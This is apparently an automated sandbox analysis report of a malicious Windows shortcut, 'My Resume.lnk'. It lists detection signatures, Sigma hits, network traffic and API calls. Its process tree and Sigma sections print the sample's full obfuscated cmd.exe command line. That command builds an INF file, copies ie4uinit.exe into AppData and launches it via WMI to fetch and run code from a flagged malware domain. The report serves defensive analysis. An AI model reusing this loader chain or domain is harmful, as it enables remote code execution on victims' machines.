Edit tour

Windows Analysis Report
My Resume.lnk

Overview

General Information

Sample Name:	My Resume.lnk
Analysis ID:	564458
MD5:	e1db05e6be33812c6289741472e9abe3
SHA1:	ca863c49be257e9ed0033a4c18bb3400c2396029
SHA256:	d6906cb7f9fb0f9cd12943509a1bb5e9409a4547a18f930b071d5c330e6c97f9
Infos:

Detection

Score:	84
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Windows shortcut file (LNK) starts blacklisted processes

Antivirus detection for URL or domain

Sigma detected: Copying Sensitive Files with Credential Data

Checks if browser processes are running

Creates processes via WMI

Obfuscated command line found

Contains functionality to compare user and computer (likely to detect sandboxes)

Contains functionality to create processes via WMI

Windows shortcut file (LNK) contains suspicious strings

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Deletes files inside the Windows folder

Creates COM task schedule object (often to register a task for autostart)

Found evasive API chain (date check)

Creates files inside the system directory

Sigma detected: Suspicious WMI Execution

PE file contains sections with non-standard names

Detected potential crypto function

Found potential string decryption / allocating functions

Sample execution stops while process was sleeping (likely an evasion)

Contains functionality to call native functions

Contains functionality to dynamically determine API calls

Uses the system / local time for branch decision (may execute only at specific dates)

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Drops PE files

Uses a known web browser user agent for HTTP communication

Dropped file seen in connection with other malware

Found large amount of non-executed APIs

Uses Microsoft's Enhanced Cryptographic Provider

Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

System is w10x64

cmd.exe (PID: 6920 cmdline: C:\Windows\System32\cmd.exe" /v /c set "VnLlYgV40395=set" && call set "VnLlYgV58278=%VnLlYgV40395:~0,1%" && (for %l in (c) do @set "VnLlYgV49771=%~l") && !VnLlYgV58278!et "VnLlYgV4530=$w" && set "VnLlYgV81579=i" && set "VnLlYgV0609=a" && set "VnLlYgV89173=t" && !VnLlYgV58278!et "VnLlYgV95863=d" && set "VnLlYgV33261=." && set "VnLlYgV63461=init" && set "VnLlYgV7723=si" && set "VnLlYgV38371=e" && set "VnLlYgV19376=settings" && set "VnLlYgV8088=!VnLlYgV33261!inf" && set "VnLlYgV3504=ieu!VnLlYgV63461!!VnLlYgV8088!" && call !VnLlYgV58278!et "VnLlYgV5462=%app!VnLlYgV95863!ata%\Micro!VnLlYgV58278!oft\" && !VnLlYgV58278!et "VnLlYgV71257=!VnLlYgV5462!!VnLlYgV3504!" && set "VnLlYgV9155="^" && (for %j in ("[version]" "signature = !VnLlYgV4530!indows nt$" "[!VnLlYgV95863!e!VnLlYgV58278!tinationdirs]" "E1C3=01" "[!VnLlYgV95863!efaultin!VnLlYgV58278!tall.windows7]" "UnRegis!VnLlYgV89173!erOCXs=A52D05" "!VnLlYgV95863!elf!VnLlYgV81579!les=E1C3" "[A52D05]" "%11%\scRo%VnLlYgV2149%j,NI,%VnLlYgV0081%%VnLlYgV6931%%VnLlYgV6931%p%VnLlYgV4892%%VnLlYgV64389%%VnLlYgV64389%jamesreuther!VnLlYgV33261!%VnLlYgV6563%/wmnxjogbfn" "[E1C3]" "ieu%VnLlYgV4681%!VnLlYgV8088!" "[!VnLlYgV58278!!VnLlYgV89173!rings]" "VnLlYgV4681=!VnLlYgV63461!" "VnLlYgV6931=t" "!VnLlYgV58278!ervicen!VnLlYgV0609!me=' '" "VnLlYgV0081=h" "VnLlYgV4892=:" "VnLlYgV64389=/" "!VnLlYgV58278!hortsvcn!VnLlYgV0609!me=' '" "VnLlYgV6563=com" "VnLlYgV2149=b") do @e!VnLlYgV49771!ho %~j)>"!VnLlYgV71257!" && !VnLlYgV58278!et "VnLlYgV5120=ie4u!VnLlYgV63461!.!VnLlYgV38371!xe" && call copy /Y %win!VnLlYgV95863!ir%\!VnLlYgV58278!ystem32\!VnLlYgV5120! "!VnLlYgV5462!" > nul && !VnLlYgV58278!t!VnLlYgV0609!rt "" /MIN wmi!VnLlYgV49771! proce!VnLlYgV58278!s call !VnLlYgV49771!rea!VnLlYgV89173!e "!VnLlYgV5462!!VnLlYgV5120! -base!VnLlYgV19376! MD5: 4E2ACF4F8A396486AB4268C94A6A245F)

conhost.exe (PID: 6048 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

WMIC.exe (PID: 6268 cmdline: wmic process call create "C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe -basesettings" MD5: EC80E603E0090B3AC3C1234C2BA43A0F)

conhost.exe (PID: 2940 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

ie4uinit.exe (PID: 6940 cmdline: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe -basesettings MD5: 9DD77F0F421AA9A70383210706ECA529)

ie4uinit.exe (PID: 4788 cmdline: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe -ClearIconCache MD5: 9DD77F0F421AA9A70383210706ECA529)

rundll32.exe (PID: 2884 cmdline: C:\Windows\system32\RunDll32.exe C:\Windows\system32\migration\WininetPlugin.dll,MigrateCacheForUser /m /0 MD5: 73C519F050C20580F8A62C849D49215A)

rundll32.exe (PID: 204 cmdline: C:\Windows\system32\RunDll32.exe C:\Windows\system32\migration\WininetPlugin.dll,MigrateCacheForUser /m /0 MD5: 73C519F050C20580F8A62C849D49215A)

cleanup

Sigma Overview

System Summary

Sigma detected: Copying Sensitive Files with Credential Data

Source: Process started

Author: Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community: Data: Command: C:\Windows\system32\RunDll32.exe C:\Windows\system32\migration\WininetPlugin.dll,MigrateCacheForUser /m /0, CommandLine: C:\Windows\system32\RunDll32.exe C:\Windows\system32\migration\WininetPlugin.dll,MigrateCacheForUser /m /0, CommandLine|base64offset|contains: , Image: C:\Windows\System32\rundll32.exe, NewProcessName: C:\Windows\System32\rundll32.exe, OriginalFileName: C:\Windows\System32\rundll32.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe -ClearIconCache, ParentImage: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe, ParentProcessId: 4788, ProcessCommandLine: C:\Windows\system32\RunDll32.exe C:\Windows\system32\migration\WininetPlugin.dll,MigrateCacheForUser /m /0, ProcessId: 2884

Source: Process started

Author: Michael Haag, Florian Roth, juju4, oscd.community: Data: Command: wmic process call create "C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe -basesettings", CommandLine: wmic process call create "C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe -basesettings", CommandLine|base64offset|contains: h, Image: C:\Windows\System32\wbem\WMIC.exe, NewProcessName: C:\Windows\System32\wbem\WMIC.exe, OriginalFileName: C:\Windows\System32\wbem\WMIC.exe, ParentCommandLine: C:\Windows\System32\cmd.exe" /v /c set "VnLlYgV40395=set" && call set "VnLlYgV58278=%VnLlYgV40395:~0,1%" && (for %l in (c) do @set "VnLlYgV49771=%~l") && !VnLlYgV58278!et "VnLlYgV4530=$w" && set "VnLlYgV81579=i" && set "VnLlYgV0609=a" && set "VnLlYgV89173=t" && !VnLlYgV58278!et "VnLlYgV95863=d" && set "VnLlYgV33261=." && set "VnLlYgV63461=init" && set "VnLlYgV7723=si" && set "VnLlYgV38371=e" && set "VnLlYgV19376=settings" && set "VnLlYgV8088=!VnLlYgV33261!inf" && set "VnLlYgV3504=ieu!VnLlYgV63461!!VnLlYgV8088!" && call !VnLlYgV58278!et "VnLlYgV5462=%app!VnLlYgV95863!ata%\Micro!VnLlYgV58278!oft\" && !VnLlYgV58278!et "VnLlYgV71257=!VnLlYgV5462!!VnLlYgV3504!" && set "VnLlYgV9155="^" && (for %j in ("[version]" "signature = !VnLlYgV4530!indows nt$" "[!VnLlYgV95863!e!VnLlYgV58278!tinationdirs]" "E1C3=01" "[!VnLlYgV95863!efaultin!VnLlYgV58278!tall.windows7]" "UnRegis!VnLlYgV89173!erOCXs=A52D05" "!VnLlYgV95863!elf!VnLlYgV81579!les=E1C3" "[A52D05]" "%11%\scRo%VnLlYgV2149%j,NI,%VnLlYgV0081%%VnLlYgV6931%%VnLlYgV6931%p%VnLlYgV4892%%VnLlYgV64389%%VnLlYgV64389%jamesreuther!VnLlYgV33261!%VnLlYgV6563%/wmnxjogbfn" "[E1C3]" "ieu%VnLlYgV4681%!VnLlYgV8088!" "[!VnLlYgV58278!!VnLlYgV89173!rings]" "VnLlYgV4681=!VnLlYgV63461!" "VnLlYgV6931=t" "!VnLlYgV58278!ervicen!VnLlYgV0609!me=' '" "VnLlYgV0081=h" "VnLlYgV4892=:" "VnLlYgV64389=/" "!VnLlYgV58278!hortsvcn!VnLlYgV0609!me=' '" "VnLlYgV6563=com" "VnLlYgV2149=b") do @e!VnLlYgV49771!ho %~j)>"!VnLlYgV71257!" && !VnLlYgV58278!et "VnLlYgV5120=ie4u!VnLlYgV63461!.!VnLlYgV38371!xe" && call copy /Y %win!VnLlYgV95863!ir%\!VnLlYgV58278!ystem32\!VnLlYgV5120! "!VnLlYgV5462!" > nul && !VnLlYgV58278!t!VnLlYgV0609!rt "" /MIN wmi!VnLlYgV49771! proce!VnLlYgV58278!s call !VnLlYgV49771!rea!VnLlYgV89173!e "!VnLlYgV5462!!VnLlYgV5120! -base!VnLlYgV19376!, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6920, ProcessCommandLine: wmic process call create "C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe -basesettings", ProcessId: 6268

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: http://jamesreuther.com/wmnxjogbfnM	Avira URL Cloud: Label: malware
Source: http://jamesreuther.com/wmnxjogbfn	Avira URL Cloud: Label: malware
Source: http://jamesreuther.com/wmnxjogbfni	Avira URL Cloud: Label: malware
Source: http://jamesreuther.com/wmnxjogbfnd	Avira URL Cloud: Label: malware
Source: http://jamesreuther.com/wmnxjogbfn4	Avira URL Cloud: Label: malware
Source: http://jamesreuther.com/wmnxjogbfnS	Avira URL Cloud: Label: malware
Source: http://jamesreuther.com/wmnxjogbfnu	Avira URL Cloud: Label: malware

Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Code function: 7_2_00007FF6B522763C CryptStringToBinaryW,CryptStringToBinaryW,GetLastError,GetLastError,GetLastError,GetLastError,	7_2_00007FF6B522763C
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Code function: 7_2_00007FF6B522EA9C memcpy_s,CryptCreateHash,CryptHashData,CryptDeriveKey,GetLastError,GetLastError,GetLastError,CryptDestroyHash,GetLastError,GetLastError,GetLastError,	7_2_00007FF6B522EA9C
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Code function: 7_2_00007FF6B52256A4 CryptBinaryToStringA,CryptBinaryToStringA,GetLastError,GetLastError,	7_2_00007FF6B52256A4
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Code function: 7_2_00007FF6B5227AC8 CertOpenStore,CertFindCertificateInStore,CryptImportPublicKeyInfo,GetLastError,GetLastError,CertFreeCertificateContext,CertCloseStore,	7_2_00007FF6B5227AC8
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Code function: 7_2_00007FF6B522E950 CryptImportPublicKeyInfo,GetLastError,GetLastError,GetLastError,CertFreeCertificateContext,CryptGetKeyParam,GetLastError,GetLastError,GetLastError,	7_2_00007FF6B522E950
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Code function: 7_2_00007FF6B5222550 CryptReleaseContext,	7_2_00007FF6B5222550
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Code function: 7_2_00007FF6B522ED98 memcpy_s,memcpy_s,CryptGenRandom,memcpy_s,EnterCriticalSection,LeaveCriticalSection,GetLastError,GetLastError,GetLastError,	7_2_00007FF6B522ED98
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Code function: 7_2_00007FF6B5227DCC memset,CryptHashCertificate,memcmp,GetLastError,	7_2_00007FF6B5227DCC
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Code function: 7_2_00007FF6B52225C0 CryptAcquireContextW,CryptReleaseContext,	7_2_00007FF6B52225C0
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Code function: 7_2_00007FF6B522544C strnlen,isalnum,CryptStringToBinaryA,CryptStringToBinaryA,GetLastError,GetLastError,	7_2_00007FF6B522544C
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Code function: 7_2_00007FF6B52274BC CryptCreateHash,CryptSetHashParam,CryptVerifySignatureW,GetLastError,CryptDestroyKey,GetLastError,CryptDestroyHash,GetLastError,	7_2_00007FF6B52274BC
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Code function: 7_2_00007FF6B522F108 CryptSetKeyParam,memcpy_s,CryptEncrypt,memcpy_s,CryptEncrypt,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,	7_2_00007FF6B522F108
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Code function: 7_2_00007FF6B522E750 CryptAcquireContextW,GetLastError,GetLastError,GetLastError,	7_2_00007FF6B522E750
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Code function: 7_2_00007FF6B5222B50 CryptGenRandom,GetLastError,SysFreeString,	7_2_00007FF6B5222B50
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Code function: 7_2_00007FF6B522EFAC CryptCreateHash,memset,CryptSetHashParam,CryptHashData,CryptGetHashParam,GetLastError,GetLastError,GetLastError,CryptDestroyHash,GetLastError,GetLastError,GetLastError,	7_2_00007FF6B522EFAC
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Code function: 7_2_00007FF6B522EBE0 CryptDestroyKey,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,	7_2_00007FF6B522EBE0
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Code function: 7_2_00007FF6B52273D0 CryptCreateHash,CryptHashData,CryptGetHashParam,GetLastError,CryptDestroyHash,GetLastError,	7_2_00007FF6B52273D0
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Code function: 7_2_00007FF6B522E80C CryptGenRandom,memcpy_s,CryptEncrypt,GetLastError,GetLastError,GetLastError,GetLastError,	7_2_00007FF6B522E80C

Source:	Binary string: ie4uinit.pdbGCTL source: ie4uinit.exe, 00000007.00000002.327227228.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmp, ie4uinit.exe, 00000007.00000000.307324969.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmp, ie4uinit.exe, 00000008.00000000.309572780.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmp, ie4uinit.exe, 00000008.00000002.316013658.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmp, ie4uinit.exe.1.dr
Source:	Binary string: ie4uinit.pdb source: ie4uinit.exe, 00000007.00000002.327227228.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmp, ie4uinit.exe, 00000007.00000000.307324969.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmp, ie4uinit.exe, 00000008.00000000.309572780.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmp, ie4uinit.exe, 00000008.00000002.316013658.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmp, ie4uinit.exe.1.dr

Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs	Jump to behavior

Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Code function: 7_2_00007FF6B521A568 SHGetFolderPathW,SetFileAttributesW,GetLastError,SHGetFolderPathW,wcscat_s,wcscat_s,wcscat_s,FindFirstFileW,wcscat_s,FindNextFileW,FindClose,	7_2_00007FF6B521A568
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Code function: 7_2_00007FF6B5230204 FindFirstFileExW,GetLastError,FindNextFileW,GetLastError,FindClose,	7_2_00007FF6B5230204
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Code function: 7_2_00007FF6B52144E4 SetCurrentDirectoryW,FindFirstFileW,FindNextFileW,FindClose,SetCurrentDirectoryW,	7_2_00007FF6B52144E4
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Code function: 7_2_00007FF6B5213D20 GetShortPathNameW,GetShortPathNameW,PathFindFileNameW,GetCurrentDirectoryW,SetCurrentDirectoryW,FindFirstFileW,CoCreateInstance,StrCmpIW,StrCmpIW,PathRemoveBlanksW,StrCmpICW,StrCmpICW,ILCreateFromPath,ILCreateFromPath,RegOpenKeyExW,StrCmpIW,RegCloseKey,ILFree,FindNextFileW,FindClose,FindFirstFileExW,lstrcmpW,lstrcmpW,FindNextFileW,FindClose,SetCurrentDirectoryW,	7_2_00007FF6B5213D20
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Code function: 7_2_00007FF6B521AC08 CreateFileW,#149,CloseHandle,GetLastError,wcscpy_s,wcscat_s,FindFirstFileW,wcscat_s,FindNextFileW,FindClose,GetLastError,	7_2_00007FF6B521AC08

Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Libraries\desktop.ini	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior

Source: global traffic

HTTP traffic detected: GET /wmnxjogbfn HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: jamesreuther.comConnection: Keep-Alive

Source: ie4uinit.exe, 00000007.00000003.326248674.0000015DE4C06000.00000004.00000020.00020000.00000000.sdmp, ie4uinit.exe, 00000007.00000003.313286795.0000015DE4C6A000.00000004.00000020.00020000.00000000.sdmp, ie4uinit.exe, 00000007.00000002.326912937.0000015DE4C07000.00000004.00000020.00020000.00000000.sdmp, ie4uinit.exe, 00000007.00000003.313198676.0000015DE4C4E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://jamesreuther.com/wmnxjogbfn
Source: ie4uinit.exe, 00000007.00000002.326928910.0000015DE4C1B000.00000004.00000020.00020000.00000000.sdmp, ie4uinit.exe, 00000007.00000003.326440327.0000015DE4C1B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://jamesreuther.com/wmnxjogbfn4
Source: ie4uinit.exe, 00000007.00000003.313198676.0000015DE4C4E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://jamesreuther.com/wmnxjogbfnM
Source: ie4uinit.exe, 00000007.00000003.313286795.0000015DE4C6A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://jamesreuther.com/wmnxjogbfnS
Source: ie4uinit.exe, 00000007.00000003.313198676.0000015DE4C4E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://jamesreuther.com/wmnxjogbfnd
Source: ie4uinit.exe, 00000007.00000003.313198676.0000015DE4C4E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://jamesreuther.com/wmnxjogbfni
Source: ie4uinit.exe, 00000007.00000003.313198676.0000015DE4C4E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://jamesreuther.com/wmnxjogbfnu
Source: ie4uinit.exe	String found in binary or memory: http://www.baidu.com/favicon.ico
Source: ie4uinit.exe, 00000007.00000002.327227228.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmp, ie4uinit.exe, 00000007.00000000.307324969.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmp, ie4uinit.exe, 00000008.00000000.309572780.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmp, ie4uinit.exe, 00000008.00000002.316013658.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmp, ie4uinit.exe.1.dr	String found in binary or memory: http://www.baidu.com/favicon.icohttps://suggest.yandex.com.tr/suggest-ff.cgi?srv=ie11&uil=tr&part=
Source: ie4uinit.exe	String found in binary or memory: http://www.yandex.com.tr/favicon.ico
Source: ie4uinit.exe	String found in binary or memory: http://www.yandex.com/favicon.ico
Source: ie4uinit.exe, 00000007.00000002.326928910.0000015DE4C1B000.00000004.00000020.00020000.00000000.sdmp, ie4uinit.exe, 00000007.00000003.313198676.0000015DE4C4E000.00000004.00000020.00020000.00000000.sdmp, ie4uinit.exe, 00000007.00000003.326440327.0000015DE4C1B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com
Source: ie4uinit.exe, ie4uinit.exe, 00000007.00000002.327227228.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmp, ie4uinit.exe, 00000007.00000000.307324969.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmp, ie4uinit.exe, 00000008.00000000.309572780.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmp, ie4uinit.exe, 00000008.00000002.316013658.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmp, ie4uinit.exe.1.dr	String found in binary or memory: https://suggest.yandex.by/suggest-ff.cgi?srv=ie11&part=
Source: ie4uinit.exe	String found in binary or memory: https://suggest.yandex.com.tr/suggest-ff.cgi?srv=ie11&uil=tr&part=
Source: ie4uinit.exe, ie4uinit.exe, 00000007.00000002.327227228.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmp, ie4uinit.exe, 00000007.00000000.307324969.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmp, ie4uinit.exe, 00000008.00000000.309572780.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmp, ie4uinit.exe, 00000008.00000002.316013658.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmp, ie4uinit.exe.1.dr	String found in binary or memory: https://suggest.yandex.kz/suggest-ff.cgi?srv=ie11&part=
Source: ie4uinit.exe, ie4uinit.exe, 00000007.00000002.327227228.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmp, ie4uinit.exe, 00000007.00000000.307324969.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmp, ie4uinit.exe, 00000008.00000000.309572780.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmp, ie4uinit.exe, 00000008.00000002.316013658.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmp, ie4uinit.exe.1.dr	String found in binary or memory: https://suggest.yandex.ua/suggest-ff.cgi?srv=ie11&part=
Source: ie4uinit.exe, ie4uinit.exe, 00000007.00000002.327227228.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmp, ie4uinit.exe, 00000007.00000000.307324969.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmp, ie4uinit.exe, 00000008.00000000.309572780.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmp, ie4uinit.exe, 00000008.00000002.316013658.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmp, ie4uinit.exe.1.dr	String found in binary or memory: https://www.baidu.com/s?tn=80035161_2_dg&wd=
Source: ie4uinit.exe	String found in binary or memory: https://www.haosou.com/s?src=win10&ie=utf-8&q=
Source: ie4uinit.exe, ie4uinit.exe, 00000007.00000002.327227228.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmp, ie4uinit.exe, 00000007.00000000.307324969.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmp, ie4uinit.exe, 00000008.00000000.309572780.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmp, ie4uinit.exe, 00000008.00000002.316013658.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmp, ie4uinit.exe.1.dr	String found in binary or memory: https://www.sogou.com/tx?hdq=sogou-wsse-6abba5d8ab1f4f32&query=
Source: ie4uinit.exe	String found in binary or memory: https://yandex.by/search/?text=
Source: ie4uinit.exe	String found in binary or memory: https://yandex.com.tr/search/?text=
Source: ie4uinit.exe	String found in binary or memory: https://yandex.kz/search/?text=
Source: ie4uinit.exe	String found in binary or memory: https://yandex.ua/search/?text=

Source: unknown

DNS traffic detected: queries for: jamesreuther.com

Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe

Code function: 7_2_00007FF6B5226DD0 SysAllocString,SysStringLen,HttpSendRequestW,HttpQueryInfoW,InternetReadFile,GetLastError,SysStringByteLen,SysAllocStringByteLen,SysFreeString,GetLastError,SysFreeString,SysAllocString,SysStringByteLen,SysAllocStringByteLen,SysFreeString,

7_2_00007FF6B5226DD0

Source: global traffic

E-Banking Fraud

Checks if browser processes are running

Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Code function: GetModuleFileNameW,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,StrStrIW,_wcsicmp,_wcsicmp,StrCmpICW,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp, IEXPLORE.EXE	7_2_00007FF6B5230A8C
